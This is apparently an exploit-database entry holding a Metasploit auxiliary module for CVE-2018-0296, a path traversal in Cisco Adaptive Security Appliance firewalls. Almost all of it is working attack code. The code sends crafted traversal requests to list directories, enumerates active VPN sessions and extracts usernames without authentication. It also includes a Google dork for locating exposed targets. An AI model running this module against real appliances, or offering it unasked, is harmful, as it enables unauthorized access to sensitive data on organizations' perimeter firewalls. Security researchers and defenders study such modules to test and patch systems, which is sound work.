Cisco Adaptive Security Appliance Path Traversal



EKU-ID: 7771 CVE: 2018-0296 OSVDB-ID:
Author: Angelo Ruwantha Published: 2018-07-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


require 'msf/core'

	class MetasploitModule < Msf::Auxiliary

		include Msf::Exploit::Remote::HttpClient

		    def initialize(info={})
			super(update_info(info,
			    'Name'           => "Cisco Adaptive Security Appliance  - Path Traversal",
			    'Description'    => %q{
				    Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
				A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
				Google Dork:inurl:+CSCOE+/logon.html
			    },
			    'License'        => MSF_LICENSE,
			    'Author'         =>
				[
				    'Yassine Aboukir',   #Initial  discovery
				    'Angelo Ruwantha @h3llwings'  	  #msf module
				],
			    'References'     =>
				[
				    ['EDB', '44956'],
				    ['URL', 'https://www.exploit-db.com/exploits/44956/']
				],
			    'Arch'           => ARCH_CMD,
			   'Compat'          =>
				{
				    'PayloadType' => 'cmd'
				},
			    'Platform'       => ['unix','linux'],
			    'Targets'        =>
				[
				    ['3000 Series Industrial Security Appliance (ISA)
					ASA 1000V Cloud Firewall
					ASA 5500 Series Adaptive Security Appliances
					ASA 5500-X Series Next-Generation Firewalls
					ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
					Adaptive Security Virtual Appliance (ASAv)
					Firepower 2100 Series Security Appliance
					Firepower 4100 Series Security Appliance
					Firepower 9300 ASA Security Module
					FTD Virtual (FTDv)', {}]
				],
			    'Privileged'     => false,
			    'DefaultTarget'  => 0))

				register_options(
				[
					OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
					OptString.new('SSL', [true, 'set it as true', 'true']),
					OptString.new('RPORT', [true, '443', '443']),
				], self.class)
		end


		def run
			uri = target_uri.path

			res = send_request_cgi({
				'method'   => 'GET',
				'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
				
			})
 

			if res && res.code == 200 && res.body.include?("{'name'")
				print_good("#{peer} is Vulnerable")
				print_status("Directory Index ")
				print_good(res.body)
			       res_dir = send_request_cgi({
				'method'   => 'GET',
				'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
				
				})
				res_users = send_request_cgi({
				'method'   => 'GET',
				'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
				
				})
				userIDs=res_users.body.scan(/[0-9]\w+/).flatten
				
				print_status("CSCEO Directory ") 
				print_good(res_dir.body)
		
				print_status("Active Session(s) ")
				print_status(res_users.body)
				x=0
				begin
				print_status("Getting User(s)")
				while (x<=userIDs.length)
					users = send_request_cgi({
					'method'   => 'GET',
					'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
					
					})
				 
					grab_username=users.body.scan(/user:\w+/)
					nonstr=grab_username
					if (!nonstr.nil? && nonstr!="")
						print_good("#{nonstr}")
					end
					x=x+1
				end
				rescue
					print_status("Complete")
				end
				 
				 
			else
				print_error("safe")
				return Exploit::CheckCode::Safe
			end
		end
	end